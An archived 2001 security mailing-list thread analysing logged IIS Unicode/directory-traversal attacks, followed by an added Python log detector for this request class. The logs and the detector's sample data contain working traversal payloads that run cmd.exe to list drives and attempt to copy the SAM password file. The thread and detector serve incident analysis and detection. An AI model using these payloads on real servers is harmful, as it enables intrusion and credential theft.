Security Incidents: Re: IIS Unicode attack decode

From: Portnoy, Gary <gportnoy_at_BELENOSINC.COM>
Date: Tue, 20 Mar 2001 12:57:15 -0500

Robert,

This indeed is the IIS Unicode exploit. It looks like an automatic tool, based
on the quick succession of the requests initially, but then they slow down,
and the attacker has to stop and think, as things don't go exactly as he
planned. Notice that some GETs returned the code 200, meaning he was
able to successfully obtain the directory structure of your C: and D: drives,
as well as c:\winnt and some others. You also have an executable _vti_bin
directory, which signifies to the attacker that you have FrontPage installed.
He could exploit some FrontPage vulnerabilities. You are right, he wasn't
able to obtain sam._ from the repair directory due to permissions, but from
what it looks like your webroot is on the C: drive, so he/she can now run any
executable in the winnt directory, unless IUSR_computername is denied access to
them. That's all they need to turn your computer into a warez site, as was
detailed in postings by Ron Grove from 2/24/01 to the incidents list. That
generated quite a discussion, so check it out...

You probably need to load MS patch Q277873
http://www.microsoft.com/technet/security/bulletin/MS00-086.asp

-Gary-

Gary Portnoy
Network Administrator
gportnoy_at_belenosinc.com

PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C

> -----Original Message-----
> From: ROBERT DEMAIN [mailto:rdemain_at_RM.COM]
> Sent: Tuesday, March 20, 2001 9:56 AM
> To: INCIDENTS_at_SECURITYFOCUS.COM
> Subject: IIS Unicode attack decode
>
>
> Hello All,
>
> Recently I've been seeing quite a few attempts from the same Russian IP
> trying to send Unicode commands to a web server. These attacks were picked
> up by an IDS. Below are extracts from the log file on the web server (see
> below).
>
> My understanding of what has happened here is as follows:
> - attacker tries a few attempts at doing a dir listing of c: and d:
> - attacker tries to copy important stuff from the \repair directory to
>   c:\inetpub\wwwroot (most unfriendly)
> - attacker tries to copy a bitmap (Blue%20Lace%2016.bmp) - not sure what
>   this is about
>
> Putting it all together, it seems the attacker tried to use the IIS 4 and 5
> Unicode exploit to copy the SAM file to a place where he/she/it thought they
> could get it from (on this server c:\inetpub\wwwroot is not the default web
> site or anything, but I believe it is on a default IIS install). This
> failed for two main reasons: 1. the iusr_servername account (which is the
> user account this exploit can run as - correct me if I'm wrong) does not
> have permissions on \repair; 2. the copy of the file to c:\inetpub\wwwroot
> would also fail, as iusr_servername would not have the rights.
>
> Anyone have any comments on this? Anyone else seen activity like this?
>
> Regards
>
> Rob
>
>
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\repair\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\AdminScripts\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\wwwroot\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
>
Received on Mar 20 2001
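Detection logic for the requests quoted in this thread, as an added example that is not part of the original posts or of any Microsoft tooling. It parses W3C extended log lines in the field order the quoted log uses (an assumption), percent-decodes the URI stem the way the vulnerable IIS canonicaliser did (accepting overlong UTF-8 such as %c0%af for "/" and %c1%9c for "\", which is what MS00-086 fixed), flags any request whose decoded stem ends in a watched system32 binary (the watchlist is an assumption), and treats a 200 as a confirmed execution, following the reading in the reply above. The sample lines are constructed: four mirror entries quoted in the thread and one adds the percent-encoded form, which you would only see in a raw capture or IDS alert, since the IIS log above already records the resolved `..` segments.

```python
"""Detect IIS Unicode / directory-traversal command execution attempts
(the MS00-086 / Q277873 request class) in W3C extended log lines.

Added example, not code from the original thread. The field order, the
binary watchlist and the constructed sample log are assumptions."""
import re
from urllib.parse import unquote_to_bytes

# Assumed field order, matching the quoted log:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
LOG_RE = re.compile(
    r'^(?P<date>\S+) (?P<time>\S+) (?P<cip>\S+) \S+ (?P<sip>\S+) (?P<port>\d+) '
    r'(?P<method>[A-Z]+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3}) (?P<ua>\S+)$')

# Assumed watchlist: system32 binaries an attacker reaches through this bug.
TARGET_BINARIES = {'cmd.exe', 'command.com', 'tftp.exe', 'ftp.exe'}

SAMPLE_LOG = [  # constructed; the first four mirror entries quoted in the thread
    r'2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible)',
    r'2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/3.0+(compatible)',
    r'2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)',
    r'2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)',
    # Constructed: overlong UTF-8 form of '../' (the MS00-086 evasion); strict UTF-8 rejects %c0%af.
    r'2001-03-19 22:30:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible)',
]


def lenient_utf8_decode(raw: bytes) -> str:
    """Two-byte UTF-8 decoder that, like the vulnerable IIS canonicaliser,
    also accepts overlong sequences (%c0%af -> '/', %c1%9c -> '\\').
    Valid two-byte characters decode normally; other bytes pass through."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return ''.join(out)


def parse_line(line: str):
    """Split one log line into named fields; None if it does not match the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def classify(entry: dict):
    """Return a finding when the decoded URI stem names a watched binary."""
    raw = unquote_to_bytes(entry['stem'])
    lenient = lenient_utf8_decode(raw).replace('\\', '/')
    strict = raw.decode('utf-8', errors='replace').replace('\\', '/')
    segments = lenient.split('/')
    target = segments[-1].lower()
    if target not in TARGET_BINARIES:
        return None
    return {
        'when': f"{entry['date']} {entry['time']}",
        'client': entry['cip'],
        'target': target,
        'traversal_depth': segments.count('..'),
        'overlong_encoding': lenient != strict,   # %c0%af-style evasion present
        'command': entry['query'].replace('+', ' ') if entry['query'] != '-' else '',
        'status': entry['status'],
        'executed': entry['status'] == 200,       # 200 = cmd.exe ran and returned output
        'user_agent': entry['ua'],
    }


def analyse(lines):
    """All findings, in log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is not None:
            finding = classify(entry)
            if finding is not None:
                findings.append(finding)
    return findings


def summarise(findings):
    """Per-client rollup: attempts, confirmed executions, commands run, agents seen."""
    by_client = {}
    for f in findings:
        s = by_client.setdefault(
            f['client'], {'attempts': 0, 'executed': 0, 'commands': [], 'agents': set()})
        s['attempts'] += 1
        s['agents'].add(f['user_agent'])
        if f['executed']:
            s['executed'] += 1
            s['commands'].append(f['command'])
    return by_client


if __name__ == '__main__':
    for client, s in summarise(analyse(SAMPLE_LOG)).items():
        print(f"{client}: {s['attempts']} attempts, {s['executed']} executed, "
              f"{len(s['agents'])} user agents")
        for cmd in s['commands']:
            print('   ran:', cmd)
```

Two design points: the finding keys on the decoded target binary rather than on the presence of `..`, so the `/scripts/\/winnt/system32/cmd.exe` variant (no dot-dot at all) is still caught; and `overlong_encoding` is computed by comparing the lenient decode with a strict one, so a request that relied on the bug to get past the canonicaliser is distinguishable from one that simply walked through a virtual directory. The change of User-Agent mid-session, which the reply above reads as a tool giving way to a human, shows up in the per-client `agents` set.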
